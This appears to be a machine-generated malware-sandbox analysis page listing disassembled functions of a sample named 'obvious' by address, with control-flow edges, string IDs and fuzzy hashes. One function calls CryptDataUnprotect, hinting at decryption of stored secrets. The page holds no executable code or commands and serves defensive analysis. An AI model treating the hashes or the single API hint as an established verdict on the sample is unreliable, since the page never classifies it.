                              • String ID: @\"q$@\"q$H\"q$H\"q$H\"q$P\"q$P\"q$P\"q$X\"q$X\"q$X\"q$`\"q$`\"q$`\"q$h\"q$h\"q$h\"q$p\"q$p\"q$p\"q$x\"q$x\"q$x\"q$f/q
                              • API String ID: 0-1930805683
                              • Opcode ID: f766547b9759139ef1c288c3c558268220ea87d77b9f970e78ba23bb44eeeec7
                              • Instruction ID: d4e33d9d4f46d256ac6d718e966f8a90b40767c971094052bf853e83d533ef26
                              • Opcode Fuzzy Hash: f766547b9759139ef1c288c3c558268220ea87d77b9f970e78ba23bb44eeeec7
                              • Instruction Fuzzy Hash: 60B22971B0EA8A4FD769DB78846A5B87BD1FF55321B0541FED049CB1E2ED296C02C740
                              Function 00007FFD9BCA6E43 Relevance: 24.4, Strings: 19, Instructions: 602COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 506 7ffd9bca6e43-7ffd9bca6ecb 512 7ffd9bca6ecd-7ffd9bca6ed1 506->512 513 7ffd9bca6f02-7ffd9bca6f09 512->513 514 7ffd9bca6ed2-7ffd9bca6ed8 512->514 515 7ffd9bca6f0b-7ffd9bca6f16 513->515 516 7ffd9bca6f60-7ffd9bca6f8c 513->516 519 7ffd9bca6edf-7ffd9bca6f01 514->519 515->512 521 7ffd9bca6f18-7ffd9bca6f5c 515->521 517 7ffd9bca6f92-7ffd9bca7052 516->517 518 7ffd9bca7054-7ffd9bca707e 516->518 517->518 523 7ffd9bca7080-7ffd9bca7097 518->523 524 7ffd9bca70af-7ffd9bca70b6 518->524 519->513 521->516 546 7ffd9bca709c-7ffd9bca70ae 523->546 525 7ffd9bca70b8-7ffd9bca70f9 524->525 526 7ffd9bca710d-7ffd9bca7139 524->526 544 7ffd9bca7156-7ffd9bca71eb 525->544 560 7ffd9bca70fb-7ffd9bca710c 525->560 531 7ffd9bca713f-7ffd9bca7152 526->531 532 7ffd9bca7201-7ffd9bca722b 526->532 531->544 538 7ffd9bca725c-7ffd9bca7263 532->538 539 7ffd9bca722d-7ffd9bca7232 532->539 542 7ffd9bca7265-7ffd9bca72b8 538->542 543 7ffd9bca72ba-7ffd9bca72cd 538->543 552 7ffd9bca7239-7ffd9bca7249 539->552 542->543 550 7ffd9bca732b-7ffd9bca739a 543->550 551 7ffd9bca72cf-7ffd9bca72e6 543->551 576 7ffd9bca724c-7ffd9bca725b 544->576 644 7ffd9bca71ed 544->644 546->524 606 7ffd9bca73f7-7ffd9bca7408 550->606 627 7ffd9bca739c-7ffd9bca73ab 550->627 555 7ffd9bca72ec-7ffd9bca732a 551->555 556 7ffd9bca73ae-7ffd9bca73c8 551->556 569 7ffd9bca724a 552->569 555->550 564 7ffd9bca7426-7ffd9bca7451 556->564 565 7ffd9bca73ca-7ffd9bca73d8 556->565 560->526 597 7ffd9bca74b0-7ffd9bca7559 564->597 598 7ffd9bca7453 564->598 567 7ffd9bca73da-7ffd9bca73df 565->567 568 7ffd9bca7409-7ffd9bca7410 565->568 583 7ffd9bca73e6-7ffd9bca73f6 567->583 577 7ffd9bca7467-7ffd9bca7493 568->577 578 7ffd9bca7412-7ffd9bca7425 568->578 569->576 576->538 584 7ffd9bca7499-7ffd9bca74ac 577->584 585 7ffd9bca755b-7ffd9bca7585 577->585 578->564 583->606 584->597 593 7ffd9bca75b6-7ffd9bca75b7 585->593 594 7ffd9bca7587-7ffd9bca759e 585->594 601 7ffd9bca75b9-7ffd9bca75fa 593->601 602 7ffd9bca760e-7ffd9bca763a 593->602 626 7ffd9bca75a3-7ffd9bca75b5 594->626 597->585 598->597 604 7ffd9bca7455-7ffd9bca7463 598->604 624 7ffd9bca7657-7ffd9bca76ec 601->624 643 7ffd9bca75fc-7ffd9bca760a 601->643 608 7ffd9bca7640-7ffd9bca7653 602->608 609 7ffd9bca7702-7ffd9bca772c 602->609 604->577 606->568 608->624 617 7ffd9bca772e-7ffd9bca7733 609->617 618 7ffd9bca775d-7ffd9bca775e 609->618 635 7ffd9bca773a-7ffd9bca7745 617->635 620 7ffd9bca77b5-7ffd9bca77e1 618->620 621 7ffd9bca7760-7ffd9bca77b1 618->621 631 7ffd9bca77e7-7ffd9bca7843 620->631 632 7ffd9bca78a9-7ffd9bca78d3 620->632 621->620 642 7ffd9bca7748-7ffd9bca774a 624->642 681 7ffd9bca76ee 624->681 626->593 631->632 638 7ffd9bca78d5-7ffd9bca78da 632->638 639 7ffd9bca7904-7ffd9bca790b call 7ffd9bca7954 632->639 635->642 650 7ffd9bca78e1-7ffd9bca7940 call 7ffd9bca7954 638->650 656 7ffd9bca7942-7ffd9bca7953 639->656 648 7ffd9bca774b-7ffd9bca775c 642->648 643->602 644->569 651 7ffd9bca71ef-7ffd9bca71ff 644->651 648->618 650->656 651->532 681->648 682 7ffd9bca76f0-7ffd9bca7700 681->682 682->609
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @\"q$@\"q$P\"q$P\"q$P\"q$X\"q$X\"q$X\"q$`\"q$`\"q$`\"q$h\"q$h\"q$h\"q$p\"q$p\"q$x\"q$x\"q$x\"q
                              • API String ID: 0-1243318442
                              • Opcode ID: 0d5d641f875a3a3d09890d5dd0846c7fd659104f6b51d6e462949745cdda8203
                              • Instruction ID: 4ff2c22ce9c7a5e7c089e50b40d79115f5c2c681103abd15918a5de82f33f6ed
                              • Opcode Fuzzy Hash: 0d5d641f875a3a3d09890d5dd0846c7fd659104f6b51d6e462949745cdda8203
                              • Instruction Fuzzy Hash: 5A021472B0EA8A4FD76C9B7C546A2B877D1EFA932170541FED049CB2E2ED295C42C341
                              Function 00007FFD9BCA89E2 Relevance: 8.8, Strings: 6, Instructions: 1278COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1110 7ffd9bca89e2-7ffd9bca89eb 1111 7ffd9bca8a35-7ffd9bca8a4c 1110->1111 1112 7ffd9bca89ed-7ffd9bca8a0d 1110->1112 1115 7ffd9bca8a96-7ffd9bca8a9d 1111->1115 1116 7ffd9bca8a4e-7ffd9bca8a84 1111->1116 1118 7ffd9bca8aa1-7ffd9bca8ae1 1115->1118 1117 7ffd9bca8a86-7ffd9bca8a95 1116->1117 1116->1118 1117->1115 1124 7ffd9bca8ae7-7ffd9bca8b87 1118->1124 1125 7ffd9bca8c08-7ffd9bca8c29 1118->1125 1144 7ffd9bca8b8e-7ffd9bca8bbd 1124->1144 1126 7ffd9bca8c30-7ffd9bca8c41 1125->1126 1127 7ffd9bca8c48-7ffd9bca8c99 1126->1127 1128 7ffd9bca8c43 1126->1128 1138 7ffd9bca8c9b-7ffd9bca8d12 call 7ffd9bca972a 1127->1138 1139 7ffd9bca8cbd-7ffd9bca8ccb call 7ffd9bca972a 1127->1139 1128->1127 1160 7ffd9bca8d18-7ffd9bca8db8 1138->1160 1161 7ffd9bca8e3d-7ffd9bca8e5e 1138->1161 1148 7ffd9bca9721-7ffd9bca9729 1139->1148 1144->1126 1155 7ffd9bca8bbf-7ffd9bca8c04 1144->1155 1155->1125 1182 7ffd9bca8dbf-7ffd9bca8dee 1160->1182 1162 7ffd9bca8e65-7ffd9bca8e76 1161->1162 1164 7ffd9bca8e78 1162->1164 1165 7ffd9bca8e7d-7ffd9bca8ece 1162->1165 1164->1165 1173 7ffd9bca8fa3-7ffd9bca8fb1 call 7ffd9bca9778 1165->1173 1174 7ffd9bca8ed4-7ffd9bca8f03 1165->1174 1173->1148 1185 7ffd9bca8f05-7ffd9bca8f0d 1174->1185 1186 7ffd9bca8f5c-7ffd9bca8f69 1174->1186 1182->1162 1190 7ffd9bca8df0-7ffd9bca8e34 1182->1190 1188 7ffd9bca8f6d 1185->1188 1189 7ffd9bca8f0f-7ffd9bca8f1b 1185->1189 1186->1188 1191 7ffd9bca8f6e-7ffd9bca8f7a 1188->1191 1192 7ffd9bca8fb4-7ffd9bca8ff8 call 7ffd9bca9778 1188->1192 1198 7ffd9bca8f1d-7ffd9bca8f21 1189->1198 1199 7ffd9bca8f2e-7ffd9bca8f38 1189->1199 1190->1161 1191->1173 1205 7ffd9bca8f7c-7ffd9bca8f94 1191->1205 1212 7ffd9bca8ffe-7ffd9bca909e 1192->1212 1213 7ffd9bca9123-7ffd9bca9144 1192->1213 1200 7ffd9bca8f3e-7ffd9bca8f5b 1198->1200 1201 7ffd9bca8f23-7ffd9bca8f29 1198->1201 1202 7ffd9bca8f3b-7ffd9bca8f3d 1199->1202 1200->1186 1201->1202 1206 7ffd9bca8f2b-7ffd9bca8f2c 1201->1206 1202->1200 1205->1173 1206->1199 1237 7ffd9bca90a5-7ffd9bca90d4 1212->1237 1214 7ffd9bca914b-7ffd9bca915c 1213->1214 1215 7ffd9bca915e 1214->1215 1216 7ffd9bca9163-7ffd9bca91b4 1214->1216 1215->1216 1225 7ffd9bca91d8-7ffd9bca91e6 call 7ffd9bca97c6 1216->1225 1226 7ffd9bca91b6-7ffd9bca922d call 7ffd9bca97c6 1216->1226 1225->1148 1245 7ffd9bca9355-7ffd9bca9376 1226->1245 1246 7ffd9bca9233-7ffd9bca926c 1226->1246 1237->1214 1243 7ffd9bca90d6-7ffd9bca911a 1237->1243 1243->1213 1249 7ffd9bca937d-7ffd9bca938e 1245->1249 1255 7ffd9bca929d-7ffd9bca92d3 1246->1255 1256 7ffd9bca926d-7ffd9bca929b 1246->1256 1251 7ffd9bca9395-7ffd9bca939d 1249->1251 1252 7ffd9bca9390 1249->1252 1253 7ffd9bca939e-7ffd9bca941f call 7ffd9bca9814 1251->1253 1252->1251 1274 7ffd9bca9425-7ffd9bca9443 1253->1274 1275 7ffd9bca954a-7ffd9bca956b 1253->1275 1266 7ffd9bca92da-7ffd9bca9309 1255->1266 1256->1255 1266->1249 1272 7ffd9bca930b-7ffd9bca9354 1266->1272 1272->1245 1272->1253 1282 7ffd9bca9444-7ffd9bca947a 1274->1282 1276 7ffd9bca9572-7ffd9bca9583 1275->1276 1279 7ffd9bca9585 1276->1279 1280 7ffd9bca958a-7ffd9bca95d8 1276->1280 1279->1280 1289 7ffd9bca95da-7ffd9bca9622 call 7ffd9bca9862 1280->1289 1290 7ffd9bca95f3-7ffd9bca9601 call 7ffd9bca9862 1280->1290 1286 7ffd9bca947c-7ffd9bca94c5 1282->1286 1307 7ffd9bca94cc-7ffd9bca94fb 1286->1307 1301 7ffd9bca967b-7ffd9bca9681 1289->1301 1302 7ffd9bca9624-7ffd9bca9627 1289->1302 1290->1148 1303 7ffd9bca9683 1301->1303 1304 7ffd9bca96f2 1301->1304 1305 7ffd9bca96a8-7ffd9bca96ea 1302->1305 1306 7ffd9bca9629-7ffd9bca962b 1302->1306 1308 7ffd9bca96a7 1303->1308 1304->1148 1312 7ffd9bca975b-7ffd9bca9760 1305->1312 1313 7ffd9bca96ec-7ffd9bca96ed 1305->1313 1306->1308 1310 7ffd9bca962d 1306->1310 1307->1276 1320 7ffd9bca94fd-7ffd9bca9541 1307->1320 1308->1305 1314 7ffd9bca962f-7ffd9bca9633 1310->1314 1315 7ffd9bca9670-7ffd9bca9675 1310->1315 1313->1304 1317 7ffd9bca9676 1314->1317 1318 7ffd9bca9635-7ffd9bca963f 1314->1318 1315->1317 1317->1301 1318->1315
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: (g/q$0g/q$8g/q$@g/q$Hg/q$Pg/q
                              • API String ID: 0-3411227121
                              • Opcode ID: 4b65960f271e86ae94b613aa4f5af53543e27bb56a2b159864f5ee20f14e0d6c
                              • Instruction ID: 2f44b9bfa58b972b930f29e38304a0c8ad8d73fe11ae615be9a497c002fbd43f
                              • Opcode Fuzzy Hash: 4b65960f271e86ae94b613aa4f5af53543e27bb56a2b159864f5ee20f14e0d6c
                              • Instruction Fuzzy Hash: 4EA27330609A4E8FDB98EF68C865AA973E1FF58314F5106B8D41EC7296CF75E942CB40
                              Function 00007FFD9BAE3218 Relevance: 8.0, Strings: 6, Instructions: 535COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1323 7ffd9bae3218-7ffd9bae477a 1325 7ffd9bae477c-7ffd9bae478c 1323->1325 1326 7ffd9bae47d6-7ffd9bae47da 1323->1326 1327 7ffd9bae4796-7ffd9bae47b8 1325->1327 1328 7ffd9bae478e-7ffd9bae4791 1325->1328 1329 7ffd9bae47dc-7ffd9bae4808 call 7ffd9bad0408 1326->1329 1330 7ffd9bae481e-7ffd9bae4822 1326->1330 1327->1326 1333 7ffd9bae4c61-7ffd9bae4c8c 1328->1333 1340 7ffd9bae480d-7ffd9bae481d 1329->1340 1331 7ffd9bae4857-7ffd9bae485b 1330->1331 1332 7ffd9bae4824-7ffd9bae4856 call 7ffd9bad77d0 1330->1332 1338 7ffd9bae48ca-7ffd9bae48eb 1331->1338 1339 7ffd9bae485d-7ffd9bae4882 1331->1339 1332->1331 1341 7ffd9bae48f2-7ffd9bae4903 1338->1341 1339->1341 1349 7ffd9bae4884-7ffd9bae48c4 1339->1349 1340->1330 1343 7ffd9bae490a-7ffd9bae4972 call 7ffd9bae4ca4 call 7ffd9bae4cfb call 7ffd9bae1598 1341->1343 1344 7ffd9bae4905 1341->1344 1360 7ffd9bae49c9-7ffd9bae49d8 1343->1360 1361 7ffd9bae4974-7ffd9bae49a0 call 7ffd9badf300 1343->1361 1344->1343 1349->1338 1363 7ffd9bae49da-7ffd9bae49eb 1360->1363 1364 7ffd9bae49f2-7ffd9bae4a8a call 7ffd9bae16b0 1360->1364 1373 7ffd9bae49a5-7ffd9bae49c8 1361->1373 1366 7ffd9bae49f1 1363->1366 1367 7ffd9bae4ab3-7ffd9bae4ad5 1363->1367 1394 7ffd9bae4a8f-7ffd9bae4ab2 1364->1394 1366->1364 1370 7ffd9bae4adb-7ffd9bae4b37 1367->1370 1371 7ffd9bae4b9f-7ffd9bae4be4 1367->1371 1370->1371 1383 7ffd9bae4be8-7ffd9bae4c37 call 7ffd9bad1e60 call 7ffd9bad1800 call 7ffd9bae3288 1371->1383 1373->1360 1402 7ffd9bae4c39-7ffd9bae4c5c 1383->1402 1403 7ffd9bae4c5e-7ffd9bae4c5f 1383->1403 1394->1367 1402->1333 1403->1333
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8`"q$8`"q$@`"q$@`"q$H`"q$H`"q
                              • API String ID: 0-4259246571
                              • Opcode ID: ad5dea4d42ea0fd763de3f25ccd2875efa752a919bce95526f35d0e11db388e4
                              • Instruction ID: fafaaca09189ba71f49b41ee0cbcb18a3fba35123c9b869c684457f818bdcee1
                              • Opcode Fuzzy Hash: ad5dea4d42ea0fd763de3f25ccd2875efa752a919bce95526f35d0e11db388e4
                              • Instruction Fuzzy Hash: 11F1D631A09A4E8FDB98DF6884A56B977E1FF98310B1541BDD40EC72E2DE79AC42C740
                              Function 00007FFD9BC97399 Relevance: 7.2, Strings: 2, Instructions: 4672COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: b/q$b/q
                              • API String ID: 0-595216909
                              • Opcode ID: 5e6acb7748671b7ca49e819b5faea0955ce8d33953adbb6561e00331f4cf894f
                              • Instruction ID: 469e8c0f26549a5097144f01895d7f08b473d25a5117cc3a4e4b32a1f86e767b
                              • Opcode Fuzzy Hash: 5e6acb7748671b7ca49e819b5faea0955ce8d33953adbb6561e00331f4cf894f
                              • Instruction Fuzzy Hash: 0C733871A1E7CA4FE3398B7484656A97BE0EF46304F0545BEC48E8B1A7DE386907C742
                              Function 00007FFD9BCA06CD Relevance: 4.2, Strings: 3, Instructions: 446COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8f/q$8f/q$H
                              • API String ID: 0-4181802071
                              • Opcode ID: 51e1c44dca0dd1d542a59fda2a8adef1f8e7779780272c44a0c7d5c7aa997845
                              • Instruction ID: 6a990d79864aeb2b8e664e8b4f0219a1667166e47d827ece372c6a03fea3d498
                              • Opcode Fuzzy Hash: 51e1c44dca0dd1d542a59fda2a8adef1f8e7779780272c44a0c7d5c7aa997845
                              • Instruction Fuzzy Hash: B6E1D231F1EA1D4FEBA8EB7888656BC77D1EF58750F060179E44EC32A2DE28AD418741
                              Function 00007FFD9BAEAF45 Relevance: 3.1, Strings: 1, Instructions: 1867COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;L
                              • API String ID: 0-2817095199
                              • Opcode ID: 1b65b33bdb4adc7fab874297fc6fdaf2c7c13fcb8bb4e2d7ee425ccd34dea9cd
                              • Instruction ID: 3e8cdb030e1a41bdaeb18c172558618e93c12cf1557514ecf76ddc59fa51ab15
                              • Opcode Fuzzy Hash: 1b65b33bdb4adc7fab874297fc6fdaf2c7c13fcb8bb4e2d7ee425ccd34dea9cd
                              • Instruction Fuzzy Hash: F6E25C7061DB898FD7B8DF18C4A9AAA73E1FF98304F11457DD48DC72A1DA34A942CB42
                              Function 00007FFD9BC9DC67 Relevance: 3.1, Strings: 2, Instructions: 606COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d/q$e/q
                              • API String ID: 0-3536358171
                              • Opcode ID: 80830761f1db36cbc82208822cc600c8ada126b0439c8444face24eeb9ff1d24
                              • Instruction ID: 7cb46dad63378d1bc0a34539f28273fe42c093b255805b394c6c51ca20651751
                              • Opcode Fuzzy Hash: 80830761f1db36cbc82208822cc600c8ada126b0439c8444face24eeb9ff1d24
                              • Instruction Fuzzy Hash: FD123830A0AA4E4FEBA4DF7888616ED77E1FF59310F1502B9D019D71EACE39A906C741
                              Function 00007FFD9BAEB128 Relevance: 2.1, Strings: 1, Instructions: 836COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_H
                              • API String ID: 0-3521414399
                              • Opcode ID: c59d8bddf42837317e7b4098add9d270154ac1d325bbde5481f3ef810974187d
                              • Instruction ID: c514c541c746f1b99df8db404d388ae6c3101cb506ec98fcf26344e9af7e1dce
                              • Opcode Fuzzy Hash: c59d8bddf42837317e7b4098add9d270154ac1d325bbde5481f3ef810974187d
                              • Instruction Fuzzy Hash: BA420171B19A0D4FEBA8DA58806967573D2FFA8348F1501BDD09EC72E2DE29ED02C741
                              Function 00007FFD9BC9378C Relevance: 1.6, APIs: 1, Instructions: 119encryptionCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID: CryptDataUnprotect
                              • String ID:
                              • API String ID: 834300711-0
                              • Opcode ID: 64053d59d5d9152cfef823ebbfd4726e6324cee86cb2c649f9bf383378fc2663
                              • Instruction ID: 3b329e6c815886e867dde68878dfd7d7d3714e48df6847c5e2e4309d28e21de2
                              • Opcode Fuzzy Hash: 64053d59d5d9152cfef823ebbfd4726e6324cee86cb2c649f9bf383378fc2663
                              • Instruction Fuzzy Hash: FE31A33191CA4C8FDB58DF5CD846AA9B7E0FBA8321F00422FE449D3652DB74A8558BC2
                              Function 00007FFD9BADDFD0 Relevance: 1.0, Instructions: 977COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 595f23e5acabae37b9acbbf7bbc36bd164b017fcb4236ee32c413a5aaab78bc6
                              • Instruction ID: 0abe51a01aa732dfa04f812695b9c0d636618d42c3f9427c5624e8966bfe21ca
                              • Opcode Fuzzy Hash: 595f23e5acabae37b9acbbf7bbc36bd164b017fcb4236ee32c413a5aaab78bc6
                              • Instruction Fuzzy Hash: 6862093070DA8E8FDB65EBB48866AEA7BE1FF85310F5506BDE019C71D7C9689802C741
                              Function 00007FFD9BB089C0 Relevance: .8, Instructions: 828COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 842dfba95d5b58c9a4e86b48098804eaee318323dec9f178ef14bf41449bbd3e
                              • Instruction ID: 6365fd1cd86527f73d34dc0dc1aac36105b6e20f3c50479004adb7967a55fac5
                              • Opcode Fuzzy Hash: 842dfba95d5b58c9a4e86b48098804eaee318323dec9f178ef14bf41449bbd3e
                              • Instruction Fuzzy Hash: 7732D430B1EA4D4FEBA4EB5C8864A7977E1FF98354F0501B9E48DC72EADE24E9418740
                              Function 00007FFD9BB24528 Relevance: .8, Instructions: 760COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fafb302dd00f2afbd5a95a76e832b6ba63c499e270c8a22dee7d698c10637bfa
                              • Instruction ID: 4aa2089c3284b3b6a06c138cdab5d50949ae4d2ef19e9413a8384b71b1c69158
                              • Opcode Fuzzy Hash: fafb302dd00f2afbd5a95a76e832b6ba63c499e270c8a22dee7d698c10637bfa
                              • Instruction Fuzzy Hash: 5A424030A19A098FEBA8DB58C4A5BA973E1FF68304F1141BDD45EC72E5DE34E981CB41
                              Function 00007FFD9BB245A0 Relevance: .7, Instructions: 740COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce32407a2fef10c49a47950101b4b498cff47377702876bbec3abf37e3105171
                              • Instruction ID: 795156705774da237443d30508551ff97ed6f7421807d841fa76623aebd8ef25
                              • Opcode Fuzzy Hash: ce32407a2fef10c49a47950101b4b498cff47377702876bbec3abf37e3105171
                              • Instruction Fuzzy Hash: 7132C232718A0A4FDBA8DA19C4A1AB5B3E2FFA8318B11456DD05EC75D6CE35FD42C780
                              Function 00007FFD9BAF1680 Relevance: .7, Instructions: 712COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2eb51689ebd737010812ec8a7be1b8e67f0d76742b00ef388722751ec0eb8f37
                              • Instruction ID: 2ac1afd867c6f04a16837c8b827b67718eb1292a1a4848ab670531fa62c69da5
                              • Opcode Fuzzy Hash: 2eb51689ebd737010812ec8a7be1b8e67f0d76742b00ef388722751ec0eb8f37
                              • Instruction Fuzzy Hash: 64124231B1DB4E4FE368DE5C84965B673D1FB95324B10467EE08AC32E6EE25F8428781
                              Function 00007FFD9BAE5760 Relevance: .6, Instructions: 610COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4db2d4a7ceba9a6cc0deff826897012eb2a3f6012097e56a9850522171831ed
                              • Instruction ID: 7cda5a93bff05e6f57067acf1277dd4333a912bebeec45a873de1a70422d6485
                              • Opcode Fuzzy Hash: a4db2d4a7ceba9a6cc0deff826897012eb2a3f6012097e56a9850522171831ed
                              • Instruction Fuzzy Hash: 71121871B09A4E8FDBA8DF6894656B973E1FF98320B1141BED409C72E6DE75AC02C740
                              Function 00007FFD9BC9092C Relevance: .6, Instructions: 565COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1722540fd88b55166798848b9a1409342e480558689cd18c621267c4a9afc99e
                              • Instruction ID: 7e28bef5b20b4eab1965361a147f76929d3cf3a833edb61135542a0c4c12d16a
                              • Opcode Fuzzy Hash: 1722540fd88b55166798848b9a1409342e480558689cd18c621267c4a9afc99e
                              • Instruction Fuzzy Hash: F6122221A0E7CA4FE767973848355B87FA1AF26310B0A01EBD089CB1F7ED19AC45C342
                              Function 00007FFD9BAE445E Relevance: .5, Instructions: 549COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f8df31993b4cf437070e2f09319f153cb3ce2348259eb0d5a9253dda60f0e4a
                              • Instruction ID: 61664ce36f8e405a2a0b0413cf361cb03806b52deb476e364025bf83f0564409
                              • Opcode Fuzzy Hash: 6f8df31993b4cf437070e2f09319f153cb3ce2348259eb0d5a9253dda60f0e4a
                              • Instruction Fuzzy Hash: 3002E330B09A4E8FDB99DF68C860AA977E1FF99310B1501ADD41DC72E6CE75E942CB40
                              Function 00007FFD9BCA364C Relevance: .4, Instructions: 441COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6df8bb105a4148dae374f5362019946d7a46b02afa1901dc633efe0bb4e498b7
                              • Instruction ID: 2d15dec6d2b771964d08fa6e09dea2d57e2c9b1a88759c28c265e988496e9261
                              • Opcode Fuzzy Hash: 6df8bb105a4148dae374f5362019946d7a46b02afa1901dc633efe0bb4e498b7
                              • Instruction Fuzzy Hash: 7AD13521B0EA494FE7A9DB7884B16B977D1EF85314F0502BDD08EC72E2DE28B9428741
                              Function 00007FFD9BC96C65 Relevance: .4, Instructions: 354COMMON
                              Download Yara Rule
                              Memory Dump Source
